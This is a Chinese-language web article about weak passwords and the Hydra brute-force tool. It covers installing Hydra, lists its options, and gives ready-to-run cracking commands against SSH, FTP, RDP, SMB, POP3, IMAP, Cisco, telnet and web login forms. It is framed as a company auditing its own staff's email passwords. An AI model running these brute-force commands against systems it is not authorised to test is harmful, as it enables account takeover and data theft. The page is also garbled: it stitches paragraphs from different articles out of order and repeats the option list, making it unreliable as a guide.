当前位置: 游戏平台 > 互联网科技 > 正文

Hydra总结

时间:2020-01-09 19:57来源:互联网科技
额...经过一个月的修炼我又回来了,接下来咱们将以OWASP Top 10为标准来学习Web安全中常见的十大漏洞。 公司邮箱系统密码复杂度规则:字母大小写、数字、特殊字符,四选三,长度8位

额...经过一个月的修炼我又回来了,接下来咱们将以OWASP Top 10 为标准来学习Web安全中常见的十大漏洞。

公司邮箱系统密码复杂度规则:字母大小写、数字、特殊字符,四选三,长度8位以上。这种复杂度的密码看着是比较安全的,但因历史原因,邮箱系统开放了外网登陆权限,加之公司人数众多,必然会有少量员工把自己的密码设成看似非常复杂但又非常普遍的常规密码,这些密码很容易被爆破,从而导致公司敏感信息泄露。

Options:

-R
继续从上一次进度接着破解

-S
大写,采用SSL链接

-s <PORT>
小写,可通过这个参数指定非默认端口

-l <LOGIN>
指定破解的用户,对特定用户破解

-L <FILE>
指定用户名字典

-p <PASS>
小写,指定密码破解,少用,一般是采用密码字典

-P <FILE>
大写,指定密码字典

-e <ns>
可选选项,n:空密码试探,s:使用指定用户和密码试探

-C <FILE>
使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数

-M <FILE>
指定目标列表文件一行一条

-o <FILE>
指定结果输出文件

-f
在使用-M参数以后,找到第一对登录名或者密码的时候中止破解

-t <TASKS>
同时运行的线程数,默认为16

-w <TIME>
设置最大超时的时间,单位秒,默认是30s

-v / -V
显示详细过程

server
目标ip

service
指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等

 

 

  • 破解ssh:

    hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh

  • 破解ftp:

    hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

  • Get提交:

    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

  • 破解https:

    # hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

  • 破解teamspeak:

    # hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

  • 破解cisco:

    # hydra -P pass.txt 10.36.16.18 cisco # hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

  • 破解smb:

    # hydra -l administrator -P pass.txt 10.36.16.18 smb

  • 破解pop3:

    # hydra -l muts -P pass.txt my.pop3.mail pop3

  • 破解rdp:

    # hydra ip rdp -l administrator -P pass.txt -V

  • 破解http-proxy:

    # hydra -l admin -P pass.txt http-proxy://10.36.16.18

  • 破解imap:

    # hydra -L user.txt -p secret 10.36.16.18 imap PLAIN # hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

  • 破解telnet

    # hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

  •  破解POST表单





 

  hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>Error Password</title>”
   注释:<title>随意定制,错误信息返回</title>   

 

话不多说,今天咱们一起来学习 弱口令及爆破工具 Hydra

当必须忍受系统外网登陆的时候,出于业界良心,安全就只能不厌其烦的、定期的使用密码爆破工具主动扫描,主动发现风险用户了。以前用过burpsuite进行Web密码的扫描,操作方便但在爆破密码方面还不够强大(毕竟非专业)。最早听说过Hydra,直到最近才开始真正使用,果真是神器,支持的密码类型众多,足够使用,安装方便、操作简单。详情如下:

在全世界范围来看,安全漏洞中排名第一的既不是系统补丁缺失,也不是网站存在跨站、注入等风险,而是密码问题。一套完整的安全防御体系,很有可能因为使用弱口令而功亏一篑。弱口令即过于简单、容易被试出或猜到的密码,下面是国内常用的一些弱密码组合:

一、安装

图片 1image.png

Hydra一款开源的密码破解工具,目前Windows版本网上也能下载到,但还是推荐使用Linux版本。当前已发布linux 8.0版本,详见:

口令攻击:即对某个服务或某个接口多次尝试不同的账号密码组合,以获得目标的相应权限。这样来看,尝试的密码组合越多,则匹配上的成功性越高,为了提高效率,则需要一款自动化工具来高效执行。

  • 简介

上面8.0的包在我个人的Redhat虚拟机上没有make成功,所以我安装的是7.4版本。下载地址:

Hydra就是这样一款弱口令扫描工具,它运行于linux系统环境中,可扫描MySQL、FTP、SSH、SMB、telnet、SNMP等几十种类型的弱口令,并具有很多优点。比如扫描速度较快,稳定性很好,命令行下易于控制对目标主机的压力,软件有后续的更新维护等。

Redhat环境安装过程非常简单:

  • 安装

1、先安装工具依赖包

以Cent OS 6.5 为例Step1: 安装工具依赖包

直接 yum install openssl-devel pcre-develncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel

语法:

2、编译安装

[root@localhost ~]# yum install openssl-devel pcre-develncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel

把安装包上传至服务器:

  • 如图:

    图片 2image.png

# tar zxvf hydra-7.4.1.tar.gz

# cd hydra-7.4.1

# ./configure 

# make 

# make install

 

Step2:编译安装

二、使用实例

语法

在文件夹里面新建user.txt,password.txt进行扫描了。

[root@localhost ~]# wget http://www.thc.org/releases/hydra-7.4.1.tar.gz ##将压缩包下载到本地[root@localhost ~]# tar zxvf hydra-7.4.1.tar.gz[root@localhost ~]# cd hydra-7.4.1[root@localhost hydra-7.4.1]# ./configure ##编译&&安装[root@localhost hydra-7.4.1]# make[root@localhost hydra-7.4.1]# make install

实例截图(SSH登陆密码):

  • ./configure 会检测当前系统一些组件配置,主要是对于破解支持模块的检测,可根据需要安装对应的支持库和依赖包。

图片 3

 

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]

实例截图(邮箱登陆密码):

详细解释:

 

  • -R继续从上一次进度接着破解

  • -S大写,采用SSL链接

  • -s<PORT>小写,可通过这个参数指定非默认端口

  • -l<LOGIN>小写,指定破解的用户,对特定用户破解

  • -L<FILE>大写,指定用户名字典

  • -p<PASS>小写,指定密码破解,少用,一般是采用密码字典

  • -P<FILE>大写,指定密码字典

  • -e<ns>可选选项,n:空密码试探,s:使用指定用户和密码试探

  • -C<FILE>使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数

  • -M<FILE>指定目标列表文件一行一条

  • -o<FILE>指定结果输出文件

  • -f在使用-M参数以后,找到第一对登录名或者密码的时候中止破解

  • -t<TASKS>同时运行的线程数,默认为16

  • -w<TIME>设置最大超时的时间,单位秒,默认是30s

  • -v /-V显示详细过程

  • server目标ip

  • service指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm]imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy ciscocisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhereteamspeak sip vmauthd firebird ncp afp等等

  • OPT 可选项

图片 4

  1. 手动创建用户名字典和密码字典,这里只是为了演示,只加了几个用户名和弱口令。真正破解时,需要利用密码字典生成器生成强大的字典。

    图片 5image.png

 

三、命令语法

  1. 破解FTP
# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]

[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]   server service [OPT]

编辑:互联网科技 本文来源:Hydra总结

关键词: